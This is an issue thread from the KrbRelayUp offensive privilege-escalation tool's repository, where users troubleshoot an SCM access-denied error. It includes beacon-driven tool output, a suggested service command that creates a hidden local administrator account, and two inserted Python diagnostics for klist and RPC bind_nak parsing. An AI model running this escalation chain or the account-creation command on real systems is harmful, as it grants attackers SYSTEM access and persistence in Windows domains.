Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting).


Error opening SCM: 5

frbor opened this issue · comments

When I run the tool I get the error Error opening SCM: 5:

[screenshot: krbrelayup-scm-5]

Do you have any idea what blocks this?

It looks like OpenSCManager fails:

IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService);

but I am not sure what can cause this?

For reference, when running the same command as administrator it runs without any error.

I am actually having the same exact issue in a brand new DetectionLab environment in Azure. Everything works fine until that step, and I get the same SCM: 5.

Can you confirm that the high priv ticket was imported? (Use the klist command.)
If so, try to run krbrelayup.exe krbscm after getting this error, making sure that the ticket is indeed in klist.
Let me know if that helps.

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5

I have just confirmed the same thing as well!

beacon> shell klist
[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0> Client: Administrator @ WINDOMAIN.LOCAL
Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 5/10/2022 12:36:16 (local)
End Time: 5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm
[*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm
[+] host called home, sent: 481847 bytes
[+] received output:
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00000000
[-] Error opening SCM: 5
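The check the maintainer asks for above (confirm with klist that the high-privilege ticket is cached before running krbscm) can be scripted. The following is an added example, not code from this thread or from the KrbRelayUp project: it parses klist output in the layout quoted in the comments above and verifies that a HOST/<hostname> service ticket for the expected client is present and not yet expired. The sample klist text, the hostname WIN10 and the domain WINDOMAIN.LOCAL are constructed for the example, and the date parsing assumes the US-style timestamps the sample shows. Keep in mind that Win32 error 5 is ERROR_ACCESS_DENIED, so a cached ticket passing this check narrows the problem down but does not by itself explain the error.

```python
import re
from datetime import datetime

# Constructed sample in the layout klist prints on Windows (values modelled on the
# output quoted in this thread; not captured from a real host).
SAMPLE_KLIST = """\
Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0>     Client: Administrator @ WINDOMAIN.LOCAL
        Server: HOST/WIN10 @ WINDOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 5/10/2022 12:36:16 (local)
        End Time:   5/10/2022 22:36:16 (local)
        Renew Time: 5/17/2022 12:36:16 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
"""

TICKET_START = re.compile(r"#(\d+)>\s*Client:\s*(.+)")
TICKET_FLAGS = re.compile(r"Ticket Flags\s+(0x[0-9a-fA-F]+)\s*->\s*(.*)")


def parse_klist(text):
    """Split klist output into one dict per cached ticket (keys are klist's own labels)."""
    tickets = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = TICKET_START.match(line)
        if m:
            current = {"Index": int(m.group(1)), "Client": m.group(2).strip()}
            tickets.append(current)
            continue
        if current is None:
            continue  # header lines (LogonId, ticket count) before the first ticket
        m = TICKET_FLAGS.match(line)
        if m:  # the flags line has no colon, so it needs its own pattern
            current["Ticket Flags"] = int(m.group(1), 16)
            current["Flag Names"] = m.group(2).split()
            continue
        key, sep, value = line.partition(":")  # split on the first colon only
        if sep:
            current[key.strip()] = value.strip()
    return tickets


def parse_klist_time(value):
    """klist prints '5/10/2022 22:36:16 (local)'; assumes the US date format of the sample."""
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def check_ticket_for_krbscm(tickets, hostname, domain, client="Administrator", now=None):
    """Return a list of problems; an empty list means a usable HOST/<hostname> ticket is cached.

    Mirrors the maintainer's check: the service ticket must be for HOST/<hostname>,
    must belong to the high-privilege client, and must not have expired.
    `now` may be a datetime or a timestamp string in klist's own format.
    """
    if now is None:
        now = datetime.now()
    elif isinstance(now, str):
        now = parse_klist_time(now)
    want_client = f"{client} @ {domain}".lower()
    want_server = f"HOST/{hostname} @ {domain}".lower()
    problems = []
    matches = [t for t in tickets if t.get("Server", "").lower() == want_server]
    if not matches:
        problems.append(f"no ticket for {want_server} in cache ({len(tickets)} ticket(s) cached)")
        return problems
    for t in matches:
        if t["Client"].lower() != want_client:
            problems.append(f"ticket for {t['Server']} belongs to {t['Client']}, expected {client}")
        end = parse_klist_time(t["End Time"])
        if end <= now:
            problems.append(f"ticket for {t['Server']} expired at {end}")
    return problems


if __name__ == "__main__":
    # In practice feed it the real output: parse_klist(subprocess.check_output(["klist"], text=True))
    found = parse_klist(SAMPLE_KLIST)
    issues = check_ticket_for_krbscm(found, "WIN10", "WINDOMAIN.LOCAL", now="5/10/2022 13:00:00")
    print("ticket OK" if not issues else "\n".join(issues))
```

On a real host, replace SAMPLE_KLIST with the output of klist captured from the same logon session the tool runs in (the LogonId line is a quick way to confirm that), since a ticket imported into another session will not be seen by OpenSCManager.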

Same, having this error.

When using the tool from memory you have to specify --ServiceCommand, since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (i.e. C:\Tools\KrbRelayUp.exe system 1) and, since it's not on disk, the service will fail upon execution.
Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add" for example.

Wonder if you've had a look at the U2U escalation using a user account? @Dec0ne

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with the --ServiceCommand argument as specified, and that did not help.

@Dec0ne I've been using the service command to execute a new instance of the beacon I dropped on disk. I also tried the net localgroup command you posted above and got the same result I posted previously.

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

Same here, the issue for me is arising when I run from memory.

Hi,

I have exactly the same issue.

When debugging the network traffic I noticed that the RPC bind request ends up with a bind_nak response and the error code "Invalid checksum", whose meaning, according to the MS RPC documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329), is: "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache, and the user has local admin privilege. However, the SCMUACBypass part seems to fail for an unknown reason.

Is anyone aware of a specific (hardening) configuration that would prevent leveraging the ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.
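For anyone reproducing the trace analysis in the previous comment: the following is an added example, not code from this thread or from the KrbRelayUp project. It decodes a connection-oriented RPC bind_nak PDU directly from its bytes and names the reject reason using the table in the MS-RPCE section linked above, so the "Invalid checksum" label can be confirmed from the raw value (9, invalid_checksum) rather than from a dissector's rendering. The PDU layout follows the DCE/RPC CO common header (16 bytes: rpc_vers, rpc_vers_minor, PTYPE, pfc_flags, packed_drep, frag_length, auth_length, call_id) followed by provider_reject_reason and the supported-version list; build_bind_nak exists only to construct sample input, and the sample PDU bytes are constructed, not captured.

```python
import struct

# Reject reasons from MS-RPCE 2.2.2.5 (the page linked in the comment above).
REJECT_REASONS = {
    0: "REASON_NOT_SPECIFIED",
    1: "TEMPORARY_CONGESTION",
    2: "LOCAL_LIMIT_EXCEEDED",
    3: "CALLED_PADDR_UNKNOWN",
    4: "PROTOCOL_VERSION_NOT_SUPPORTED",
    5: "DEFAULT_CONTEXT_NOT_SUPPORTED",
    6: "USER_DATA_NOT_READABLE",
    7: "NO_PSAP_AVAILABLE",
    8: "authentication_type_not_recognized",
    9: "invalid_checksum",
}

PTYPE_BIND_NAK = 13          # DCE/RPC CO packet type for bind_nak
PFC_FIRST_FRAG = 0x01
PFC_LAST_FRAG = 0x02
DREP_LITTLE_ENDIAN = 0x10    # high nibble of packed_drep[0]: 1 = little-endian integers
CO_HEADER_LEN = 16


def build_bind_nak(reject_reason, call_id, versions=((5, 0),), little_endian=True):
    """Construct a bind_nak PDU; used here only to produce sample input for the decoder."""
    endian = "<" if little_endian else ">"
    body = struct.pack(endian + "H", reject_reason) + bytes([len(versions)])
    for major, minor in versions:
        body += bytes([major, minor])
    frag_length = CO_HEADER_LEN + len(body)
    drep = bytes([DREP_LITTLE_ENDIAN if little_endian else 0x00, 0, 0, 0])
    header = (struct.pack("<BBBB", 5, 0, PTYPE_BIND_NAK, PFC_FIRST_FRAG | PFC_LAST_FRAG)
              + drep + struct.pack(endian + "HHI", frag_length, 0, call_id))
    return header + body


def parse_bind_nak(pdu):
    """Decode the CO common header and the bind_nak body; raises ValueError on malformed input."""
    if len(pdu) < CO_HEADER_LEN + 3:
        raise ValueError("PDU too short for a bind_nak")
    rpc_vers, rpc_vers_minor, ptype, pfc_flags = struct.unpack_from("<BBBB", pdu, 0)
    if rpc_vers != 5:
        raise ValueError(f"unexpected rpc_vers {rpc_vers}")
    if ptype != PTYPE_BIND_NAK:
        raise ValueError(f"ptype {ptype} is not bind_nak ({PTYPE_BIND_NAK})")
    # packed_drep decides how the multi-byte header and body fields are encoded.
    endian = "<" if (pdu[4] & 0xF0) == DREP_LITTLE_ENDIAN else ">"
    frag_length, auth_length, call_id = struct.unpack_from(endian + "HHI", pdu, 8)
    if frag_length > len(pdu):
        raise ValueError(f"frag_length {frag_length} exceeds {len(pdu)} bytes received")
    (reason,) = struct.unpack_from(endian + "H", pdu, CO_HEADER_LEN)
    n_protocols = pdu[CO_HEADER_LEN + 2]
    versions_off = CO_HEADER_LEN + 3
    if versions_off + 2 * n_protocols > frag_length:
        raise ValueError("version list runs past frag_length")
    versions = [(pdu[versions_off + 2 * i], pdu[versions_off + 2 * i + 1])
                for i in range(n_protocols)]
    return {
        "rpc_vers_minor": rpc_vers_minor,
        "call_id": call_id,
        "pfc_flags": pfc_flags,
        "auth_length": auth_length,
        "reject_reason": reason,
        "reject_reason_name": REJECT_REASONS.get(reason, f"unknown({reason})"),
        "versions_supported": versions,
    }


# Constructed sample: a server rejecting the bind for call_id 2 with invalid_checksum.
SAMPLE_BIND_NAK = build_bind_nak(9, call_id=2)

if __name__ == "__main__":
    decoded = parse_bind_nak(SAMPLE_BIND_NAK)
    print(f"call_id={decoded['call_id']} reject_reason={decoded['reject_reason']} "
          f"({decoded['reject_reason_name']}) versions={decoded['versions_supported']}")
```

To apply it to a capture, export the TCP payload of the bind_nak frame (for the named-pipe transport this is the SMB write/read payload carrying the RPC PDU) and pass those bytes to parse_bind_nak; the call_id lets you pair the rejection with the bind request that carried the Kerberos auth verifier.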